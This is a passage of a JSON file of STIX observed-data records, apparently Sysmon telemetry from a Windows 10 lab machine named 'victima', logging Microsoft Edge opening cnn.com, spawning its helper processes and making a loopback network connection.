| "os_platform": "windows", | |
| "ip_refs": [ | |
| "5", | |
| "6" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "7" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "5": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "6": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "7": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "8": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "9": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:45.655Z", | |
| "last_observed": "2022-07-27T14:26:45.655Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--103c6cf5-d1e7-431f-a162-b9251116a9e0", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.773Z", | |
| "modified": "2022-07-28T16:05:45.773Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "ie_to_edge_stub.exe", | |
| "pid": 5380, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe\" --from-ie-to-edge=1 --customer-type=1 -- \"http://cnn.com/\"" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.016974639Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "ie_to_edge_stub.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\BHO\\ie_to_edge_stub.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b25-62e1-1102-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Users\\user\\Desktop\\", | |
| "args_count": 5, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.110Z", | |
| "last_observed": "2022-07-27T14:26:46.110Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--a1a6ec54-299d-4a1d-bbce-aa207a59177f", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.774Z", | |
| "modified": "2022-07-28T16:05:45.774Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.134", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.71", | |
| "--initial-client-data=0x104,0x108,0x10c,0xe4,0x1ac,0x7ffab494a0b8,0x7ffab494a0c8,0x7ffab494a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1302-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 6808, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=103.0.5060.134 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 \"--annotation=prod=Microsoft Edge\" --annotation=ver=103.0.1264.71 --initial-client-data=0x104,0x108,0x10c,0xe4,0x1ac,0x7ffab494a0b8,0x7ffab494a0c8,0x7ffab494a0d8", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:54.018187663Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:47.674Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=crashpad-handler", | |
| "--user-data-dir=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data", | |
| "/prefetch:7", | |
| "--monitor-self-annotation=ptype=crashpad-handler", | |
| "--database=C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad", | |
| "--annotation=IsOfficialBuild=1", | |
| "--annotation=channel=", | |
| "--annotation=chromium-version=103.0.5060.134", | |
| "--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--annotation=plat=Win64", | |
| "--annotation=prod=Microsoft Edge", | |
| "--annotation=ver=103.0.1264.71", | |
| "--initial-client-data=0x104,0x108,0x10c,0xe4,0x1ac,0x7ffab494a0b8,0x7ffab494a0c8,0x7ffab494a0d8" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\", | |
| "args_count": 14, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1302-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.200Z", | |
| "last_observed": "2022-07-27T14:26:46.200Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--af6bd8dd-4fe7-4c0e-ad4b-7d1e675d1fce", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.774Z", | |
| "modified": "2022-07-28T16:05:45.774Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2080", | |
| "--field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1502-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 32, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2080 --field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072 /prefetch:2", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:55.173798642Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:48.822Z", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=gpu-process", | |
| "--gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA=", | |
| "--mojo-platform-channel-handle=2080", | |
| "--field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072", | |
| "/prefetch:2" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\", | |
| "args_count": 6, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1502-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.701Z", | |
| "last_observed": "2022-07-27T14:26:46.701Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--9a2dc2d1-6d4e-4963-aafd-c8badf75d1b4", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.774Z", | |
| "modified": "2022-07-28T16:05:45.774Z", | |
| "objects": { | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2152", | |
| "--field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1602-000000001400}" | |
| }, | |
| "1": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "4", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --from-ie-to-edge=1 --customer-type=1 --single-argument http://cnn.com/" | |
| }, | |
| "2": { | |
| "type": "process", | |
| "parent_ref": "1", | |
| "name": "msedge.exe", | |
| "pid": 5600, | |
| "binary_ref": "6", | |
| "command_line": "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2152 --field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072 /prefetch:3", | |
| "creator_user_ref": "13" | |
| }, | |
| "3": { | |
| "type": "x-oca-event", | |
| "parent_process_ref": "1", | |
| "process_ref": "2", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:55.174636594Z", | |
| "code": "1", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "created": "2022-07-27T14:26:48.822Z", | |
| "kind": "event", | |
| "module": "sysmon", | |
| "action": "Process Create (rule: ProcessCreate)", | |
| "category": [ | |
| [ | |
| "process" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start" | |
| ], | |
| "user_ref": "13" | |
| }, | |
| "4": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "5" | |
| }, | |
| "5": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "6": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "7" | |
| }, | |
| "7": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "13": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "0": { | |
| "type": "x-ecs-process", | |
| "args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--type=utility", | |
| "--utility-sub-type=network.mojom.NetworkService", | |
| "--lang=en-US", | |
| "--service-sandbox-type=none", | |
| "--mojo-platform-channel-handle=2152", | |
| "--field-trial-handle=2200,i,13273505879763306014,10253766336105659736,131072", | |
| "/prefetch:3" | |
| ], | |
| "parent_args": [ | |
| "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", | |
| "--from-ie-to-edge=1", | |
| "--customer-type=1", | |
| "--single-argument", | |
| "http://cnn.com/" | |
| ], | |
| "parent_args_count": 5, | |
| "parent_entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}", | |
| "pe_file_version": "103.0.1264.71", | |
| "pe_product": "Microsoft Edge", | |
| "pe_description": "Microsoft Edge", | |
| "pe_original_file_name": "msedge.exe", | |
| "pe_company": "Microsoft Corporation", | |
| "working_directory": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\103.0.1264.71\\", | |
| "args_count": 8, | |
| "entity_id": "{ca21cdf6-4b26-62e1-1602-000000001400}" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.713Z", | |
| "last_observed": "2022-07-27T14:26:46.713Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--c683fd36-e4c1-47e4-85fa-f8b6e2e979f5", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.775Z", | |
| "modified": "2022-07-28T16:05:45.775Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:56.254215751Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:49.910Z", | |
| "module": "sysmon", | |
| "action": "Network connection detected (rule: NetworkConnect)", | |
| "category": [ | |
| [ | |
| "network" | |
| ] | |
| ], | |
| "event_type": [ | |
| "start", | |
| "connection", | |
| "protocol" | |
| ], | |
| "user_ref": "15", | |
| "network_ref": "5" | |
| }, | |
| "2": { | |
| "type": "x-ecs-process", | |
| "entity_id": "{ca21cdf6-4b26-62e1-1202-000000001400}" | |
| }, | |
| "3": { | |
| "type": "file", | |
| "name": "msedge.exe", | |
| "parent_directory_ref": "4" | |
| }, | |
| "4": { | |
| "type": "directory", | |
| "path": "C:\\Program Files (x86)\\Microsoft\\Edge\\Application" | |
| }, | |
| "5": { | |
| "type": "network-traffic", | |
| "dst_port": 50307, | |
| "dst_ref": "6", | |
| "src_port": 50308, | |
| "src_ref": "12", | |
| "protocols": [ | |
| "tcp", | |
| "ipv4" | |
| ] | |
| }, | |
| "6": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "7": { | |
| "type": "x-ecs-destination", | |
| "domain": "victima" | |
| }, | |
| "8": { | |
| "type": "x-oca-asset", | |
| "hostname": "victima", | |
| "os_name": "Windows 10 Pro", | |
| "os_version": "10.0", | |
| "os_platform": "windows", | |
| "ip_refs": [ | |
| "9", | |
| "10" | |
| ], | |
| "name": "victima", | |
| "id": "ca21cdf6-3888-4c03-ae56-9ad5ca4b5981", | |
| "mac_refs": [ | |
| "11" | |
| ], | |
| "architecture": "x86_64" | |
| }, | |
| "9": { | |
| "type": "ipv4-addr", | |
| "value": "192.168.56.111" | |
| }, | |
| "10": { | |
| "type": "ipv6-addr", | |
| "value": "fe80::6081:41da:9cd5:7c82" | |
| }, | |
| "11": { | |
| "type": "mac-addr", | |
| "value": "08:00:27:18:81:31" | |
| }, | |
| "12": { | |
| "type": "ipv4-addr", | |
| "value": "127.0.0.1" | |
| }, | |
| "13": { | |
| "type": "x-ecs-source", | |
| "domain": "victima" | |
| }, | |
| "14": { | |
| "type": "x-ecs-user", | |
| "domain": "VICTIMA", | |
| "id": "S-1-5-18" | |
| }, | |
| "15": { | |
| "type": "user-account", | |
| "user_id": "user", | |
| "account_login": "user" | |
| }, | |
| "16": { | |
| "type": "x-ecs-network", | |
| "community_id": "1:SWG30pBXtnbHPozHi2xMFIV9EdQ=", | |
| "direction": "egress" | |
| } | |
| }, | |
| "first_observed": "2022-07-27T14:26:46.788Z", | |
| "last_observed": "2022-07-27T14:26:46.788Z", | |
| "number_observed": 1 | |
| }, | |
| { | |
| "id": "observed-data--49c2d7a6-a9c1-4708-9ef8-906dd7f73f09", | |
| "type": "observed-data", | |
| "created_by_ref": "identity--3607d256-1879-413f-8b95-d69da77d3646", | |
| "created": "2022-07-28T16:05:45.775Z", | |
| "modified": "2022-07-28T16:05:45.775Z", | |
| "objects": { | |
| "0": { | |
| "type": "process", | |
| "name": "msedge.exe", | |
| "pid": 4316, | |
| "binary_ref": "3", | |
| "creator_user_ref": "15", | |
| "opened_connection_refs": [ | |
| "5" | |
| ] | |
| }, | |
| "1": { | |
| "type": "x-oca-event", | |
| "process_ref": "0", | |
| "host_ref": "8", | |
| "ingested": "2022-07-27T14:26:56.254959653Z", | |
| "code": "3", | |
| "provider": "Microsoft-Windows-Sysmon", | |
| "kind": "event", | |
| "created": "2022-07-27T14:26:49.910Z", | |
| "module": "sysmon", | |
